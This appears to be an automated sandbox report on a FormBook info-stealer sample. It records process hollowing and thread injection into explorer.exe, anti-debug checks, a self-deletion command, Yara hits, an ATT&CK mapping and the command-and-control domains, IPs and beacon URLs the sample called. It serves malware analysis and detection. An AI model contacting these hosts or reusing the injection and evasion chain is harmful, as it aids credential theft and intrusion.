          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05448E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05458EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013A46 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.assisttm.com
Source: C:\Windows\explorer.exe | Domain query: www.gsjbd1.club
Source: C:\Windows\explorer.exe | Network Connect: 23.110.214.34 80
Source: C:\Windows\explorer.exe | Network Connect: 45.8.125.8 80
Source: C:\Windows\explorer.exe | Domain query: www.tyjgfuke.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.yr-golf.com
Source: C:\Windows\explorer.exe | Domain query: www.fastbest.host
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1300000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Memory written: C:\Users\user\Desktop\Y1p8VPvyU2.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 3352
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Process created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.321987906.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.308514622.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.339334815.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.310601041.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmp | Binary or memory string: Program Manager (Not Responding)
Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.332640768.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314336905.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 0_2_10010AED cpuid
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

The matrix is listed per tactic column; digits attached to a technique name are the report's signature-hit badges as shown in the original.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Native API1, Shared Modules1, At (Linux), At (Windows), Cron, Launchd
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection612, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Virtualization/Sandbox Evasion2, Process Injection612, Deobfuscate/Decode Files or Information1, Obfuscated Files or Information3, Software Packing1, File Deletion1
Credential Access: Input Capture1, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery251, Virtualization/Sandbox Evasion2, Process Discovery2, Remote System Discovery1, File and Directory Discovery2, System Information Discovery113
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Input Capture1, Archive Collected Data1, Clipboard Data1, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Encrypted Channel1, Ingress Tool Transfer3, Non-Application Layer Protocol3, Application Layer Protocol13, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Impact: System Shutdown/Reboot1, Device Lockout, Delete Device Data

Behavior Graph

Behavior Graph ID: 532909, Sample: Y1p8VPvyU2, Start date: 02/12/2021, Architecture: WINDOWS, Score: 100. The rendered graph is not reproduced; the process chain, dropped files, network contacts and signatures it carried are listed below.

Top level: contacts www.caixadepandora.club; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 3 other signatures

• Y1p8VPvyU2.exe (started)
  Dropped: C:\Users\user\AppData\Local\...\msvofdls.dll (PE32); C:\Users\user\AppData\Local\...\6jgsfkran1lw1 (DOS)
  Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  • Y1p8VPvyU2.exe (started)
    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      Network: www.fastbest.host 45.8.125.8, ports 49810, 80 (SELECTELRU, Russian Federation); www.tyjgfuke.com 23.110.214.34, port 80 (LEASEWEB-USA-LAX-11US, United States); 5 other IPs or domains
      Signatures: System process connects to network (likely due to code injection or exploit)
      • cscript.exe (started)
        Network: www.tyjgfuke.com
        Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Y1p8VPvyU2.exe | 35% | Virustotal |
Y1p8VPvyU2.exe | 9% | Metadefender |
Y1p8VPvyU2.exe | 64% | ReversingLabs | Win32.Trojan.Swotter

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll | 50% | ReversingLabs | Win32.Trojan.Pwsx

          Unpacked PE Files

Source | Detection | Scanner | Label
1.0.Y1p8VPvyU2.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.Y1p8VPvyU2.exe.2420000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.Y1p8VPvyU2.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
6.2.cscript.exe.592796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.1.Y1p8VPvyU2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.Y1p8VPvyU2.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.Y1p8VPvyU2.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.Y1p8VPvyU2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.Y1p8VPvyU2.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.Y1p8VPvyU2.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
6.2.cscript.exe.35c8670.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.Y1p8VPvyU2.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
yr-golf.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom | 0% | Avira URL Cloud | safe
https://fastbest.host | 0% | Avira URL Cloud | safe
http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh | 0% | Avira URL Cloud | safe
www.tgalegail.quest/n6fr/ | 0% | Avira URL Cloud | safe
http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB | 0% | Avira URL Cloud | safe
http://www.tyjgfuke.com/$t | 0% | Avira URL Cloud | safe
http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.tyjgfuke.com | 23.110.214.34 | true | true | - | unknown
assisttm.com | 34.102.136.180 | true | false | - | unknown
yr-golf.com | 34.102.136.180 | true | false | - | unknown
www.fastbest.host | 45.8.125.8 | true | true | - | unknown
www.caixadepandora.club | 137.184.111.224 | true | false | - | unknown
www.assisttm.com | unknown | unknown | true | - | unknown
www.gsjbd1.club | unknown | unknown | true | - | unknown
www.yr-golf.com | unknown | unknown | true | - | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom | true | Avira URL Cloud: safe | unknown
http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh | false | Avira URL Cloud: safe | unknown
www.tgalegail.quest/n6fr/ | true | Avira URL Cloud: safe | low
http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://fastbest.host | cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
